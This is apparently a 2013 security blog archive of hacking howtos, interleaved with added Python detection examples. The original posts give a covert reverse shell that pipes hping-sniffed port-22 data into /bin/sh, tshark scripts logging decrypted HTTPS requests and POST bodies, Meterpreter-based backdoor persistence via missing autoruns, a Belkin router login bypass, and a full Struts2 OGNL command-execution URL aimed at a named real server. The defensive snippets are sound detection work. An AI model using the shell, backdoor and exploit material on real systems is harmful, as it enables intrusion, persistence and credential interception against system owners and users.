Oct 19, 2013

Howto: Fix for "Can't login after upgrading from Ubuntu 13.04 to Ubuntu 13.10"

sudo apt-get purge 'cinnamon*'
sudo apt-get autoremove

Source:  http://www.ubuntugeek.com/fix-for-cant-login-after-upgrading-from-ubuntu-13-04-to-ubuntu-13-10.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 18, 2013

Howto: Create a reverse shell by reusing an open port

Let's assume you want to create a reverse shell from box A to box B. Box B is your host behind NAT and box A is the victim host.

Download and install hping. On A run the following command:

hping -I eth0 -p 22 --listen PATTERN | /bin/sh

The above command puts hping in listen/sniff mode on interface eth0 and port 22, which is an open and publicly routable port. It watches for a specific PATTERN in the incoming data; this is what distinguishes the data you want to capture from the other traffic arriving on port 22. PATTERN is a signature payload that hping looks for inside the TCP data payload. You can use any keyword here, such as 'mySecret' or '[root@victim root]'.

On B run the following command:

echo "PATTERN;" | ncat -v BOXA-IP 22
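From the defender's side, the trick above only works because the "trigger" bytes are sent to a port whose real service never sees a conforming client: an SSH client's first line must start with "SSH-" (RFC 4253), and "PATTERN;" does not. The following added example (not part of the original post) shows that check over constructed packet records; the packet tuples, addresses and port numbers are all made up for the demonstration.

```python
"""
Added example: flag TCP payloads sent to port 22 whose first client bytes do
not look like an SSH identification string. Packet records are constructed.
"""

# One constructed packet record: (src_ip, src_port, dst_ip, dst_port, payload)
SAMPLE_PACKETS = [
    ("203.0.113.5", 51000, "192.0.2.10", 22, b"SSH-2.0-OpenSSH_6.2\r\n"),   # real client
    ("192.0.2.10", 22, "203.0.113.5", 51000, b"SSH-2.0-OpenSSH_6.2p2\r\n"), # server banner
    ("203.0.113.5", 51000, "192.0.2.10", 22, b"\x00\x00\x04\x0c\x0a\x14"),  # start of KEXINIT
    ("198.51.100.7", 40222, "192.0.2.10", 22, b"PATTERN;\n"),              # sniffer trigger
    ("198.51.100.7", 40222, "192.0.2.10", 22, b"id; uname -a\n"),          # follow-up data
    ("198.51.100.7", 40223, "192.0.2.10", 22, b""),                         # empty segment
]


def first_client_payload(packets, server_port=22):
    """Return {(client_ip, client_port, server_ip): first non-empty client payload}."""
    firsts = {}
    for src, sport, dst, dport, payload in packets:
        if dport != server_port or not payload:
            continue  # server->client direction or a bare ACK/SYN carries no payload
        firsts.setdefault((src, sport, dst), payload)
    return firsts


def non_ssh_flows(packets, server_port=22):
    """Flows whose first client bytes do not start with the SSH identification string."""
    return sorted(
        key
        for key, payload in first_client_payload(packets, server_port).items()
        if not payload.startswith(b"SSH-")
    )


if __name__ == "__main__":
    for client_ip, client_port, server in non_ssh_flows(SAMPLE_PACKETS):
        print(f"non-SSH data to {server}:22 from {client_ip}:{client_port}")
```

The same mismatch is visible without packet capture: the real sshd on port 22 still receives the trigger bytes and logs a "Bad protocol version identification" line for that client, so a log alert on that message is the cheapest check.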
 
Source: http://www.pedramhayati.com/2013/05/11/create-stealy-reverse-shell-using-already-openned-port/ 


Howto: Sniffing HTTP/HTTPS Traffic with tshark

tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R 'http.request.method == "GET" || http.request.method == "POST"'

tshark -r private_bob.pcap -o ssl.keys_list:"192.168.3.206","443","http","e:\education\ssl\wireshark_ssl\private-key.pem" -o ssl.debug_file:"e:\temp\ssl-debug.log" -V -R http


#### Tshark.sh for https
#!/bin/bash

tshark -o "ssl.desegment_ssl_records: TRUE" -o "ssl.desegment_ssl_application_data: TRUE" -o "ssl.keys_list: 127.0.0.1,443,http,/test/mycert.key" -o "ssl.debug_file: /var/log/https-post.log" -i eth1 -T fields -E separator="|" -t e -R "tcp.port == 443 and http.request" -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.full_uri -e data -e text >> /var/log/https.log &

#### Tshark.sh for http
#!/bin/bash

tshark -i eth1 -T fields -E separator="|" -t e -R "tcp.port == 80 and http.request" -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.full_uri -e data -e text >> /var/log/http.log &
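The two scripts write one "|"-separated line per request, in the order of the -e options: frame.time, ip.src, tcp.srcport, ip.dst, tcp.dstport, http.request.method, http.request.full_uri, data, text. The trailing text field is free-form and may itself contain "|", so a parser has to split on at most eight separators. The following added example (not from the original post or from Wireshark) parses such a log, counts requests per host and method, and flags cleartext POST bodies that carry password-like field names; the log lines are constructed.

```python
"""
Added example: parse the "|"-separated http.log produced by the tshark field
output above and summarise it. Log lines are constructed for the demo.
"""
from collections import Counter
from urllib.parse import urlsplit

# Field order matches the -e options in the Tshark.sh scripts.
FIELDS = ["time", "src", "sport", "dst", "dport", "method", "uri", "data", "text"]

SAMPLE_LOG = """\
1382100000.123456|10.0.0.5|51234|203.0.113.20|80|GET|http://example.test/index.html||
1382100001.000001|10.0.0.5|51235|203.0.113.20|80|POST|http://example.test/login|757365723d626f62|user=bob&pass=hunter2
1382100002.500000|10.0.0.9|40001|203.0.113.21|80|GET|http://other.test/a?b=c|d
1382100003.000000|10.0.0.9|40002|203.0.113.21|80|POST|http://other.test/upload||part1|part2
"""


def parse_http_log(text):
    """Yield one dict per well-formed line; lines with too few fields are skipped."""
    for line in text.splitlines():
        # maxsplit keeps any "|" inside the trailing free-text field intact
        parts = line.split("|", len(FIELDS) - 1)
        if len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        rec["host"] = urlsplit(rec["uri"]).hostname or rec["dst"]
        yield rec


def summarize(text):
    """Count requests per (host, method) so unexpected POST targets stand out."""
    return Counter((r["host"], r["method"]) for r in parse_http_log(text))


def posts_with_form_fields(text, names=("pass", "password", "pwd")):
    """Return (src, uri) for POSTs whose captured body carries a credential-like field."""
    hits = []
    for r in parse_http_log(text):
        if r["method"] != "POST":
            continue
        body = r["text"].lower()
        if any(n + "=" in body for n in names):
            hits.append((r["src"], r["uri"]))
    return hits


if __name__ == "__main__":
    for (host, method), n in sorted(summarize(SAMPLE_LOG).items()):
        print(f"{host:20} {method:5} {n}")
    for src, uri in posts_with_form_fields(SAMPLE_LOG):
        print(f"cleartext credential field from {src} to {uri}")
```

The third sample line has only eight fields and is dropped rather than mis-assigned; the fourth shows the "|" inside the text field surviving the split.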
 




Source: 
http://kvz.io/blog/2010/05/15/analyze-http-requests-with-tshark/
http://www.wireshark.org/docs/man-pages/tshark.html
http://ask.wireshark.org/questions/4766/how-to-decrypt-ssl-traffic-with-tshark-16


Tools: List of Sniffing Tools

  • arpspoof - Send out unrequested (and possibly forged) arp replies.
  • dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
  • dsniff - password sniffer for several protocols.
  • filesnarf - saves selected files sniffed from NFS traffic.
  • macof - flood the local network with random MAC addresses.
  • mailsnarf - sniffs mail on the LAN and stores it in mbox format.
  • msgsnarf - record selected messages from different Instant Messengers.
  • sshmitm - SSH monkey-in-the-middle; proxies and sniffs SSH traffic.
  • sshow - SSH traffic analyser.
  • tcpkill - kills specified in-progress TCP connections.
  • tcpnice - slow down specified TCP connections via "active" traffic shaping.
  • urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
  • webmitm - HTTP / HTTPS monkey-in-the-middle; transparently proxies.
  • webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed). Please do not abuse this software.
  • Justniffer - HTTP and TCP connection sniffer.





Oct 15, 2013

Tools: Web-Sorrow = Scanner Tool

Web-Sorrow is a Perl-based tool for misconfiguration, version detection, enumeration, and server information scanning. It is entirely focused on enumeration and collecting info on the target server. Web-Sorrow is a "safe to run" program, meaning it is not designed to be an exploit or to perform any harmful attacks.

Source: https://code.google.com/p/web-sorrow/



Howto: Create a Backdoor Using Missing Autoruns

1. Compromise the victim.

2. Get a Meterpreter shell.

3. Upload Sysinternals' autoruns.exe & autorunsc.exe to the victim machine.

4. From the upload directory, execute the following command to list the machine's missing autoruns:

$ autorunsc.exe -a | findstr /n /R "File\ not\ found"

5. We now have a list of files that are missing; these files are run at startup time.

6. Rename the backdoor to the name of the missing file and upload it to the path where it was not found.

7. Now whenever the machine is restarted you get a shell.

Source: http://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html



Howto: Track Gmail Messages with Google Analytics

Here’s how you can add Analytics tracking to your Gmail messages:
  1. Go to your Gmail and compose a new email message. You can also include attachments and inline images in your message. Once the message is ready, let it stay in your Drafts folder and do not hit the Send button.
  2. Open this Google sheet and choose the Initialize option under the Email Tracker menu. This is a one-time requirement as you’ll have to authorize the sheet to send your Gmail messages with the tracking image included.
  3. Once the script is authorized, choose Email Tracker -> Send Mail, select your Gmail draft from the drop-down, enter your Google Analytics Profile ID* and hit the Send button. Your mail will be delivered to the recipient.

Source: http://www.labnol.org/internet/email/track-gmail-with-google-analytics/8082/





Tools: Mellivora = CTF Engine

Mellivora is a basic database-driven CTF engine written in PHP.

Source: https://github.com/Nakiami/mellivora


 

Oct 14, 2013

Tools: Portspoof

The general goal of the program is to make the port scanning software (Nmap/Unicornscan/etc.) slow and its output very difficult to interpret, thus making the attacker's reconnaissance phase a challenging and bothersome task.

Source: http://linuxaria.com/article/portspoof-an-interesting-anti-snooping-tool-for-linux?lang=en



Belkin Authentication Bypass

When you first visit a Belkin router you're presented with a basic info page. It doesn't look too fancy, but if you do try to get to the juicy stuff you're confronted with a login page. Unfortunately the MD5-hashed password is stored IN A JAVASCRIPT VARIABLE on the page, so bypassing is as simple as either reversing the hash or (and this is great) simply passing it via the POST request.
Example: Share N300 Wireless N+ Router http://i.imgur.com/qTn6kF5.png
I've noted this works on just about every Belkin router with a similar frontend to this. An example of that is the F5D8236 model, a demo of which can be found at http://www.belkin.com/Pyramid/AdvancedInfo/F5D8236-4ver2111/Interfaces/F5D8236-4v2111/login.stm

Source: http://www.reddit.com/r/netsec/comments/1obilw/belkin_authentication_bypass/




Apache Software Foundation Subsite Remote Command Execution

Apache Struts2: a vulnerability triggered by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution.

# Show web root
http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWriter().flush(),%23matt.getWriter().close()}
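The request above is recognisable before anyone decodes the OGNL in it: the query string carries a parameter whose name begins with one of the three prefixes the post names. The following added example (not from the original post or from Apache) scans access-log lines for such parameter names, so a log review or WAF rule can surface attempts; it deliberately ignores ordinary parameters that merely happen to be called "action" or "redirect". The log lines, client addresses and the short placeholder payload are constructed.

```python
"""
Added example: find requests whose query parameter *names* start with
"action:", "redirect:" or "redirectAction:". Access-log lines are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qsl

STRUTS_PREFIXES = ("action:", "redirect:", "redirectaction:")

# Request line inside a common/combined log entry: "<METHOD> <target> HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

SAMPLE_ACCESS_LOG = """\
192.0.2.1 - - [14/Oct/2013:10:00:00 +0000] "GET /continuum/groupSummary.action HTTP/1.1" 200 5120
198.51.100.3 - - [14/Oct/2013:10:00:05 +0000] "GET /continuum/groupSummary.action?redirect:%24%7B%23a%3d1%7D HTTP/1.1" 302 0
198.51.100.3 - - [14/Oct/2013:10:00:07 +0000] "GET /continuum/groupSummary.action?redirectAction:login HTTP/1.1" 302 0
203.0.113.9 - - [14/Oct/2013:10:00:09 +0000] "POST /continuum/login.action?action=view HTTP/1.1" 200 300
203.0.113.9 - - [14/Oct/2013:10:00:11 +0000] "GET /docs/index.html?redirect=/home HTTP/1.1" 200 2048
"""


def struts_prefixed_params(target):
    """Return the decoded parameter names in `target` that carry a special Struts2 prefix."""
    query = urlsplit(target).query
    # keep_blank_values: the malicious form has no "=" at all, only a bare name
    names = [name for name, _ in parse_qsl(query, keep_blank_values=True)]
    return [n for n in names if n.lower().startswith(STRUTS_PREFIXES)]


def scan_access_log(text):
    """Return (client_ip, method, parameter_name) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for name in struts_prefixed_params(m.group("target")):
            hits.append((client_ip, m.group("method"), name))
    return hits


if __name__ == "__main__":
    for client_ip, method, name in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{client_ip} {method} prefixed parameter: {name!r}")
```

Matching on the decoded parameter name rather than on raw bytes is what keeps the check stable against percent-encoding variants such as the "%23" and "%3d" in the request above, while "action=view" and "redirect=/home" produce no hits.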


Source: http://en.wooyun.org/bugs/wooyun-2013-06?1065&1805


